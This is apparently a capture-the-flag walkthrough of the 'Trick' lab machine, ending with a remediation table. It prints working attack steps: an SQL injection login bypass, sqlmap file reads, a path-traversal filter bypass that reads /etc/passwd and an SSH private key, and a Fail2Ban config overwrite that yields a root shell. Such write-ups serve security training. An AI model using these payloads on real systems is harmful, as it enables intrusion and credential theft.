Trick — DNS Zone Transfer to Fail2Ban Privilege Escalation

Introduction

Trick is an Easy Linux machine that chains together several common vulnerabilities into a complete attack path leading to root access.

The compromise starts with a misconfigured DNS server that allows zone transfers, exposing hidden subdomains. One of those subdomains hosts a vulnerable payroll application affected by SQL Injection, allowing authentication bypass and credential disclosure. The SQL Injection can then be leveraged further through the database user’s FILE privilege to read sensitive server files and discover an additional virtual host.

That second application contains a Local File Inclusion vulnerability, ultimately leading to the disclosure of an SSH private key and user access. Finally, a misconfigured Fail2Ban installation combined with excessive sudo permissions allows privilege escalation to root.

Attack Overview

[DNS Zone Transfer]
        ↓
[Discover preprod-payroll.trick.htb]
        ↓
[SQL Injection Authentication Bypass]
        ↓
[Credential Disclosure]
        ↓
[SQLMap FILE Read]
        ↓
[Discover preprod-marketing.trick.htb]
        ↓
[Local File Inclusion]
        ↓
[SSH Private Key Disclosure]
        ↓
[SSH Access as michael]
        ↓
[Fail2Ban Misconfiguration]
        ↓
[Root Access]

Initial Enumeration

As usual, the first step is identifying exposed services.

sudo nmap -sC -sV -p- --min-rate 5000 -oA nmap/full 10.129.227.180

Results

Port	Service
22	SSH
25	SMTP
53	DNS
80	HTTP

The presence of a DNS server immediately stands out and will eventually become the initial entry point.

SMTP User Enumeration

The SMTP service can be queried manually using the VRFY command.

nc -nv 10.129.227.180 25

VRFY root
VRFY admin

The responses reveal that accounts such as root and mysql exist on the system. Although not directly exploitable, this information may prove useful during later stages of an assessment.

Web Enumeration

The target hostname is added locally:

echo "10.129.227.180 trick.htb" | sudo tee -a /etc/hosts

Browsing to the website reveals only a generic “Coming Soon” Bootstrap page.

Directory enumeration and virtual host fuzzing do not reveal anything interesting.

ffuf -u http://trick.htb/FUZZ \
-w wordlist.txt

ffuf -u http://trick.htb/ \
-H "Host: FUZZ.trick.htb" \
-w subdomains.txt

Since the web application appears intentionally sparse, attention shifts toward the DNS service.

DNS Zone Transfer

A DNS Zone Transfer (AXFR) allows secondary DNS servers to replicate zone information from a primary DNS server. If improperly configured, anyone can request the entire DNS zone and enumerate internal records.

Testing for AXFR:

dig axfr @10.129.227.180 trick.htb

The transfer succeeds and reveals an additional hostname:

preprod-payroll.trick.htb

After updating the hosts file:

echo "10.129.227.180 preprod-payroll.trick.htb" | sudo tee -a /etc/hosts

a payroll application becomes accessible.

SQL Injection Authentication Bypass

The payroll application presents a login form vulnerable to SQL Injection.

Using a classic authentication bypass payload:

admin' OR 1=1-- -

authentication succeeds without knowledge of valid credentials.

Once authenticated, inspecting user profiles reveals a password embedded directly within the HTML source:

<input type="password" value="SuperGucciRainbowCake">

Changing the input type to text exposes the password.

Enemigosss : SuperGucciRainbowCake

Although these credentials do not provide SSH access, they are useful for authenticated SQLMap testing.

SQLMap FILE Privilege Abuse

SQLMap confirms the injection point and identifies the privileges assigned to the database user.

sqlmap \
-u "http://preprod-payroll.trick.htb/ajax.php?action=login" \
--data="username=Enemigosss&password=SuperGucciRainbowCake" \
-p username \
--privileges \
--batch

The database user possesses the following privilege:

FILE

This privilege allows reading files from the underlying operating system.

Reading the Nginx configuration:

sqlmap \
-u "http://preprod-payroll.trick.htb/ajax.php?action=login" \
--data="username=Enemigosss&password=SuperGucciRainbowCake" \
-p username \
--file-read="/etc/nginx/sites-enabled/default" \
--batch

reveals another hidden virtual host:

preprod-marketing.trick.htb

Relevant configuration:

server {
    listen 80;
    server_name preprod-marketing.trick.htb;
    root /var/www/market;
    index index.php;

    fastcgi_pass unix:/run/php/php7.3-fpm-michael.sock;
}

The configuration also indicates that PHP code executes as the user michael.

The new hostname is added:

echo "10.129.227.180 preprod-marketing.trick.htb" | sudo tee -a /etc/hosts

Local File Inclusion

The marketing application exposes the following URL structure:

/index.php?page=services.html

The page parameter strongly suggests a potential Local File Inclusion vulnerability.

A traditional traversal attempt fails:

?page=../../../etc/passwd

However, a filter bypass using ....// succeeds:

?page=....//....//....//etc/passwd

The application returns the contents of /etc/passwd.

Among the listed users:

michael:x:1001:1001::/home/michael:/bin/bash

The next logical target is Michael’s SSH key.

?page=....//....//....//home/michael/.ssh/id_rsa

The application discloses the private key.

-----BEGIN OPENSSH PRIVATE KEY-----
[redacted]
-----END OPENSSH PRIVATE KEY-----

User Access

After saving the key locally:

chmod 600 michael.key
ssh -i michael.key michael@trick.htb

SSH access is obtained as michael.

The user flag can then be retrieved.

cat user.txt

[redacted]

User access obtained.

Privilege Escalation

Enumeration

Checking sudo permissions:

sudo -l

Output:

(root) NOPASSWD: /etc/init.d/fail2ban restart

Checking group membership:

id

uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)

Inspecting the Fail2Ban action directory:

ls -la /etc/fail2ban/action.d/

reveals that the directory is writable by the security group.

Since Michael belongs to that group and can restart Fail2Ban as root, the attack path becomes clear.

Exploitation

A malicious action file is created:

cat << EOF > /tmp/iptables-multiport.conf
[Definition]
actionstart = cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash
actionstop =
actioncheck =
actionban =
actionunban =
EOF

The original configuration is replaced:

cp /tmp/iptables-multiport.conf \
/etc/fail2ban/action.d/iptables-multiport.conf

Fail2Ban is restarted:

sudo /etc/init.d/fail2ban restart

A SUID-enabled bash binary is created.

Executing it:

/tmp/rootbash -p

provides a root shell.

whoami

root

The root flag can then be read.

cat /root/root.txt

[redacted]

Root access obtained.

Key Takeaways

Vulnerability	Root Cause	Remediation
DNS Zone Transfer	AXFR allowed from arbitrary hosts	Restrict zone transfers to trusted DNS servers
SQL Injection	Unsanitized user input in SQL queries	Use parameterized queries and prepared statements
Credential Disclosure	Password exposed in HTML source	Never expose secrets client-side
Local File Inclusion	User-controlled file inclusion	Implement strict allowlists and input validation
Fail2Ban Privilege Escalation	Writable action directory combined with privileged restart	Restrict permissions and follow least-privilege principles

Resources

• Nmap — Network scanning and service detection
• FFUF — Directory and virtual host fuzzing
• SQLMap — Automated SQL injection exploitation
• BIND / dig — DNS enumeration and zone transfers
• Fail2Ban — Intrusion prevention framework